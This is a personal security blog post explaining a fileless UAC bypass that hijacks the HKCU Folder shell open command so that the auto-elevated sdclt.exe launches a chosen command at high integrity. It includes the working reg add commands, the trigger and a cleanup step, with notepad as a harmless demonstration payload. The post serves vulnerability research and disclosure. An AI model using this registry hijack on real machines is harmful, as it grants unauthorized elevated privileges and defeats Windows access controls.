Another sdclt UAC bypass

Another sdclt UAC bypass

1. Origin of the bypass

As often with UAC, the flaw comes from an auto-elevated process. These processes have the particularity to run with high integrity level without prompting the local admin with the usual UAC window. If the user running with medium privileges can make these process load a dll or execute a command, UAC bypass is performed.

In our case, the executable is sdclt.exe. Sdclt is used in the context of Windows backup and restore mechanisms. You can check it auto-elevates using Sysinternals Sigcheck:

sigcheck.exe -m C:\Windows\System32\sdclt.exe | findstr autoElevate  
<autoElevate  xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</autoElevate>

Note: There are already a couple of known ways to abuse sdclt.exe into bypassing UAC. You can read about those two methods on Matt Nelson’s blog:

The method I found is fileless and is based on COM hijacking.
Some interesting events which occur when sdclt.exe is called from a medium integrity process:

  • It runs another process of sdclt.exe with high privilege
  • The high privilege sdclt process calls C:\Windows\System32\control.exe
  • Control.exe process runs with high privilege and ….

Using Sysinternals Procmon, we can see that control.exe is failing to find an open command for the “folder” object in the current user registry (HKCU).

This is very good sign for someone looking to bypass UAC! That is because UAC privileges are not required to write in there so we can basically make an elevated process run a command even if we are in the context of medium integrity process.

2. Exploit the bypass

You can easily test this UAC bypass with a few command lines.
Setup the registry:

reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "cmd.exe /c notepad.exe" /f && reg add HKCU\Software\Classes\Folder\shell\open\command /v "DelegateExecute" /f 

Trigger the bypass:

%windir%\system32\sdclt.exe 

You can watch notepad.exe pop with high integrity level.

After that, do not forget to clean the registry with:

reg delete "HKCU\Software\Classes\Folder\shell\open\command" /f






About

Welcome to 0x1.gitlab.io my personal blog to share my knowledge
Cyber Security, Ethical Hacking, Web & Network Auditing, Reverse Engineering and Cryptography
Website semi-configured to use with No-Script. No ADS and No use analytics tracking.


Contact

Forum : @0x1


© 0x1 | Cyber Security Consulting - Copyright All Rights Reserved